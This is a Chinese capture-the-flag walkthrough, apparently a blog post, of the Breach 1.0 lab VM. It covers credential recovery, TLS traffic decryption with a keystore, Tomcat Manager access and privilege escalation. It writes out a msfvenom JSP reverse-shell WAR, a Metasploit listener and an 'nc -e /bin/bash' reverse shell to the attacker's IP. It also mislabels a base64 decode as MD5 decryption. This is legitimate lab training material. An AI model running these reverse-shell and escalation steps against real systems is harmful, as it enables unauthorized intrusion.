Breach 1.0 靶机

Breach 1.0

环境配置

  • 设置 VMware 上的仅主机模式网卡,勾选 DHCP 自动分配 IP,将子网改为 192.168.110.0/24

    image-20231020153422311

  • 将靶机和 kali 连接到仅主机网卡

信息搜集

存活检测

image-20231020165835393

详细扫描

后台网页扫描

image-20231020170040613

网页信息搜集

image-20231020170058373

image-20231020170128236

Initech被入侵,董事会投票决定引入内部的Initech网络咨询,LLP部门来协助。鉴于此次入侵事件的高知名度和几乎灾难性的损失,随后出现了许多针对该公司的攻击。Initech已委托其顶级顾问,由Bill Lumbergh、CISSP和Peter Gibbons、CjEH、SEC+、NET+、A+领导,对漏洞进行控制和分析。该公司几乎没有意识到,这次入侵并不是熟练的黑客所为,而是一名心怀不满的前雇员离职时留下的临别礼物。TOP咨询公司一直在努力遏制这一漏洞。然而,他们自己的职业道德和留下的烂摊子可能是公司垮台的原因。
  • 查看源码发现疑似密文,并且有一个 herf 链接,点击胖子图片进行跳转

    image-20231020170750540

    Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
    
  • md5 解密

    cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh
    

    image-20231020173011317

    再次解密

    pgibbons:damnitfeel$goodtobeagang$ta
    
  • 跳转的网页

    image-20231020170843459

  • 点击 employee portal 跳转到

    image-20231020173259352

  • 尝试使用刚刚解密出的值进行登录

    pgibbons
    damnitfeel$goodtobeagang$ta
    

    成功登录

    image-20231020173442067

  • 依次查询过滤有用信息

    最终在邮件中的第三封邮件中发现 “秘密证书” 字样

    并带有文件

    image-20231020174015307

  • 下载证书

    邮件上说把文件保存到这个网址

    尝试访问

    image-20231020174201646

  • 访问网页直接下载了 index.keystore 文件

    image-20231020174359224

  • 在 View Account 页面发现了一个流量包文件,下载

    并发现密码字样,密码为 tomcat

    image-20231020212823568

    image-20231020213435047

流量信息搜集

  • 使用 wireshark 打开文件,发现有许多 TLS 加密的报文

    image-20231020213752184

  • .keystore 密钥/证书

    .keystore文件是一种用于存储密钥和证书的二进制文件格式。

    常见的TLS证书格式包括:

    1. DER格式:以.der或.crt扩展名保存的证书文件,通常包含单个X.509证书。
    2. PEM格式:以.pem或.crt扩展名保存的证书文件,它使用Base64编码,并使用"-----BEGIN CERTIFICATE-----“和”-----END CERTIFICATE-----"标记来界定证书内容。PEM格式可以包含单个或多个X.509证书。

    在Keystore中,使用Java的keytool工具可以将DER或PEM格式的证书导入到JKS或PKCS#12格式的Keystore中。

    解密:

    keytool -importkeystore -srckeystore index.keystore -destkeystore breach.p12 -deststoretype pkcs12 -srcalias tomcat
     
    -importkeystore 导出keystore
     
    -srckeystore  源keystore文件
     
    -destkeystore  导出之后的证书存放路径
     
    -deststoretype  导出keystore之后的证书类型
     
    -srcalias 源alias
    

    成功生成证书文件

    image-20231020215004422

  • 将证书文件导入 wireshark

    image-20231020215728070

    image-20231020220256455

  • 查看数据包

    发现加密密文和一个网站,wireshark 已经将其解密了

    image-20231020221105881

  • 访问网站

    被浏览器的安全措施拦截

    image-20231020221439547

  • 使用 bp 代理,拦截,放包

    image-20231021130254880

  • 输入 wireshark 流量包解密的账号密码

    tomcat
    Tt\5D8F(#!*u=G)4m7zB
    

    image-20231021130324438

  • 成功登录进入Tomcat Manager 界面

    image-20231021130459816

webshell

  • 生成 .war 木马文件

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=8888 -f war > shell.war
    

    image-20231021131314929

  • 启动 msfconsole 并设置参数,开启监听

    mscconsole
    
    use exploit/multi/handler
    
    set LHOST 192.168.110.140
    set LPORT 8888
    run
    

    image-20231021131858531

  • 上传木马文件

    image-20231021132037962

  • 打开上传的文件

    image-20231021132235570

  • 反弹成功

    image-20231021132357541

提权

信息搜集

  • 尝试 sudo -l 失败

    image-20231021132537316

  • 尝试 suid 提权失败

    image-20231021132941361

  • 搜集系统中有用信息

    最终在 /var/www/5446 目录下发现了 php 文件,其中显示了数据库的 user 为 root,并且密码为空

    image-20231021133253227

数据库信息搜集

  • 在 mysql 数据库的 user 表中发现了数据库用户 milton 及加密的密码

    6450d89bd3aff1d893b85d3ad65d2ec2
    

    image-20231021134539827

  • 解密密码

    thelaststraw
    

    image-20231021134707886

  • 查看 /etc/passwd 文件也存在该用户

    尝试用其数据库密码进行登录

    image-20231021134847987

  • 成功登录

    image-20231021134939127

  • 尝试切换 blumbergh 用户

    image-20231021135854863

  • 提示需要密码

    image-20231021135953508

  • 查看用户密码文件

    image-20231021140108218

    发现了 Bill 字样

  • 在网页信息搜集时看到过 Bill 的图片

    下载图片,检测是否有隐写信息

    strings bill.png
    

    image-20231021140809165

  • 测试登录密码

    coffeestains
    

    image-20231021141030674

  • sudo -l 查看权限

    可以使用 tee 命令修改 tidup.sh

    image-20231021141116787

    tee 命令可将一个文件输出的内容输入到另一个文件

    读取 a.txt 中文本内容写入 file.txt

    cat a.txt | tee file.txt
    
  • 查看 tidup.sh 权限

    image-20231021151358661

  • 查看文件

    image-20231021164920861

    说这个脚本每三分钟自动运行一次

  • 创建一个文件写入命令 bash

    image-20231021153535615

  • 写入

    cat shell | sudo  tee /usr/share/cleanup/tidyup.sh
    

    image-20231021154045685

  • 失败,尝试使用 nc 反弹

    nc -e /bin/bash 192.168.110.129 7777
    

    image-20231021165711137

  • 监听,等待连接

    image-20231021165809751

    成功 root

    image-20231021170223329

总结

  • TLS 加密证书、.keystore 文件

  • 浏览器指明网页 https 证书不可信可使用 bp 拦截代理解决

  • Tomcat Manager 上传 msf 生成的 .war 木马实现 webshell

  • tee

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值